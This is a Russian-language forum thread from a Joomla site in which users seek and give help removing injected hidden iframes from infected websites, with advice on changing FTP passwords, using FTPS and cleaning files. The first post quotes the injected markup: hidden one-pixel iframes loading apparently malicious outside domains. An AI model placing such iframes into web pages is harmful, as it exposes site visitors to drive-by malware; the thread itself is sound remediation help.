Вирус генерирующий iframe

Тема в разделе "Вопросы безопасности", создана пользователем Наталья, 28.07.2008.

  1. Offline

    Наталья Недавно здесь

    Регистрация:
    22.12.2007
    Сообщения:
    24
    Симпатии:
    0
    Пол:
    Женский
    У меня проблема, заражён сайт на joomla, хостеры остались глухи к моим мольбам о помощи, что делать не знаю. Суть вируса вот в чём, захожу на сайт, мне выдают вот такую гадость: [​IMG]. Ну и естественно в коде такой страницы, в самом конце обнаруживаем:
    </html> <!-- 1217248905 --><iframe src="http://ruoo.info" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://mmsreader.com" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://klinoneshoes.info" width=1 height=1 style="visibility: hidden"></iframe>.
    Естественно скачиваю весь сайт на комп, и проверяю каспером, он ничего не обнаруживает. удаляем все вредоносные строки указаные выше, и они при повторном заходе на страницу, появляются снова. Ftp пароль сменила уже сто раз, всё безтолку.
    У меня на сайте куча расширений, видимо в каком то из них, есть строчки кода которые генерят это непотребство. В сайт вложена куча сил, я не могу снести его и заново сделать. Что делать, подскажите, это просто катастрофа какая то.:'(
     
  2.  
  3. isotn
    Offline

    isotn Пользователь

    Регистрация:
    02.01.2007
    Сообщения:
    313
    Симпатии:
    7
    Пол:
    Мужской
    Ответ: Вирус генерирующий iframe

    Первое, что смотрим - какие выставлены права на запись на директории и файлы. Второе - проверяем файл index.php в папке шаблона и в корне сайта.

    Если нашла в коде ссылку на поганый сайт - убей. КАСПЕР НИЧЕГО НЕ НАЙДЕТ :D
    Если не нашла, откуда - есть 2 пути.
    1 - по очереди отключать все компоненты - авось найдешь, куда тебе инклюд впихнули.
    2 - тупо по ftp перезалить исходники, убедившись, что ты в них хаков не вносила.

    И еще раз проверь файлы шаблона. Скорее всего там.
    Если не получится - в аську стукни, или в личку напиши. Помогу. B)
     
  4. Offline

    Наталья Недавно здесь

    Регистрация:
    22.12.2007
    Сообщения:
    24
    Симпатии:
    0
    Пол:
    Женский
    Ответ: Вирус генерирующий iframe

    Всё супер, спаривилась уже, огромное спасибо за помощь. Всё оказалось просто, сменила пароль на акаунт в котором находятся все доступы к сайту, и сменила все доступы к сайту, убила все строчки с iframe, закачала на сервак и алилуя, он здоров.
     
  5. isotn
    Offline

    isotn Пользователь

    Регистрация:
    02.01.2007
    Сообщения:
    313
    Симпатии:
    7
    Пол:
    Мужской
    Ответ: Вирус генерирующий iframe

    Молодец! А в следующий раз изначально выставляй права необходимые на папки, пароли лучше генерить, а не брать из головы, ну и читать, читать, и еще раз читать...
     
  6. Offline

    vadiimm Недавно здесь

    Регистрация:
    01.06.2009
    Сообщения:
    1
    Симпатии:
    0
    Постоянно появляются файлы в каталогах сайта с названием "index.html", которые содержат iframe....,
    Я их все удалил, но касперский все равно выдает предупреждение:
    вирус HEUR Trojan.Script.Iframer и далее слудует ссылка на скрипт httt:\ templates\... ja.script.js
    я его удалил (скрипт) но касперский все равно реагирует. и выдает такое же сообщение.
    Всем зараннее спасибо кто поможет.
     
  7. Offline

    женик Недавно здесь

    Регистрация:
    22.09.2009
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Мужской
    я щас в тотал коммандер ввел название того сайта и он ищет.. уже 100 файлов нашлось, где есть этот iframe. буду вручную править...
     
  8. mike84
    Offline

    mike84 Недавно здесь

    Регистрация:
    25.11.2007
    Сообщения:
    210
    Симпатии:
    15
    Пол:
    Мужской
  9. Offline

    женик Недавно здесь

    Регистрация:
    22.09.2009
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Мужской
    или как нить по другому можно? их мног очень
     
  10. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    Запускаешь dreamweaver, нажимаешь Ctrl+F указываешь путь к Фтп сайта (спросит логин, пароль), вылетит два окошка. В первое вводишь что найти, во второе на что заменить. Ну и жмыкашь кнопку "заменить все"
     
  11. Asylum
    Offline

    Asylum специалист

    Регистрация:
    09.02.2007
    Сообщения:
    2 573
    Симпатии:
    152
    Пол:
    Мужской
    На форуме постоянно «всплывает» вопрос: - «Какая то дрянь добавляет мне во все index-ы далее, как правило, идет код с упоминанием frame». Далее придется сделать лирическое отступления для понимания механики процесса. Во всех случаях, ни или, по крайней мере, в 99.9 процентах случаев речь идет о вирусе на вашем компьютере и отправляющей связку логин – пароль роботу (боту) который в автоматическом режиме вставляет код во все страницы index на сайте. Цель этого кода открыть в браузере посетителя невидимое окно, ведущее на Интернет ресурс (как правило, Китай) с которого на машину посетителя производится попытка загрузки вируса. Если учесть что количество «зараженных» сайтов исчисляется тысячами, можете ради интереса ввести строку вредоносного кода в Гугле, а количество посетителей этих сайтов может доходить до сотни в день, можно представить, сколько компьютеров под свое управление может получить создатель заразы даже при 20 процентах успеха.
    Далее возникает вопрос – «Я все проверил антивирусом, все чисто». Все правильно, любой AVP ищет вирусы, описанные в его же базе. А любой вирус, не описанный в этой, самой базе будет жить и размножаться. Эвристический анализ, наличие которого обязательно подтвердит любой производитель в своем продукте, находится в зачаточном состоянии и временами не способен определить даже известный сжатый, например другим паковщиком.
    Другими словами, если вы не нашли врага на своем компьютере, это не значит что его там нет, хотя это не значит что с ним нельзя бороться.
    Пароли воруются в основном двумя способами
    1. Ftp клиентов можно пересчитать по пальцем рук, где они хранят пароли тоже не секрет. Вирус определяет Ftp клиента, сжимает все найденные пароли и отправляет боту. Самый простой вариант в данном случае хранить пароли не в клиенте, а сухом чистом месте. В этом случае злоумышленник получит архив только с именами хостов что, в общем, равно дырке от бублика.
    2. Второй вид – снифер, такой жучок который тихонько сидит и слушает 21 порт. При соединении с хостом удаленному серверу передается логин – пароль для аутентификации. Записываем, отправляем. В данном случае нужно использовать защищенное соединение, весь трафик между вами сервером шифруется и "слухач" в лучшем случае украдет кучу мусора. Настройка FTPS (File Transfer Protocol + SSL), как правило, описано на сайте вашего любимого хостера.
    3. Поставить на папку administrator апачевую аутентификацию

    Обновляйте антивирус, практически каждый день его базы пополняются новыми экземплярами. Поставьте фаервол и почитывайте его сообщения, перед тем как нажать «разрешить». Если какое то приложение вдруг начинает «просится» в Турцию, есть повод задуматься.

    Что делать?
    Код прописался в страницы, какие шаги нужно сделать?
    Ради интереса я зашел на форум одного очень авторитетного Российского производителя AVP (не будем тыкать пальцем). Посетительница описывала жалобную историю болезни своего сайта. И вирус на машине был найден, и пароли теперь набираются с печатного листа (даже диск был отформатирован), но после удаления с сайта зловредного кода через сутки он появляется вновь. Аналитики предлагали прислать все материалы сайта на исследование, пройти он лайн проверку на вирусы и т.д. А, в общем, это случай когда «поздно пить боржоми», пароли то давно украдены. Скрипт (бот) обходит сайты занесенные в базу и проверяет наличие своих ссылок, если их нет – записывает заново, ключи у него есть.
    Первым делом меняем логин и пароль к Фтп!
    Далее удаляем все frame (или что там у вас записано). Можно идти двумя путями
    1. Закат солнца вручную, копируем себе на компьютер папку с сайтом, последовательно открываем все index.html и index.php ищем код и удаляем. Долго и существует вероятность пропустить вставку.
    2. Запускаем dreamweaver, нажимаем Ctrl+F, откроется форма с двумя окнами. Что найти и на что заменить. Указываем путь к папке с сайтом, в случае если изменения будут вносится на хостинге (потребуется ввести логин – пароль). Если вы скачали сайт к себе, то просто обозначаем ее расположение. После нажимаем «заменить все».
    Вполне возможно, что за время проживания «гостей» ваш сайт попал в бан Google, в этом случае открыв свою страницу в Firefox, вместо своего шедевра увидите «Имеется информация, что этот сайт атакует компьютеры». В этом случае после чистки пишем Гуглу письмо с просьбой снять бан. Писать лучше без лишних фантазий и по делу, как правило, если ресурс ранее не был замечен в махинациях, в течение 2-3 дней бан будет снят.
    Апачевая авторизация в админ центре –
    Хоть и не имеет прямого отношения к ifram, но в настоящее время актуальна. В случае если ваши кукисы (что это такое и как их воруют можно почитать в Википедии), уплывут на сторону, апачевая авторизация станет дополнительным барьером. Включить его можно в панели управления хостингом, как правило, это – «директории защищенные паролем». Крайне желательно включить SSL, в этом случае весь трафик будет шифроваться и его перехват на предмет получения паролей будет бессмысленным. Более подробную информацию можно получить у своего хостера.

    Это конечно не исчерпывающая информация по защите сайта, и не на что не претендует.
     
    Последнее редактирование: 08.10.2009

Поделиться этой страницей

Загрузка...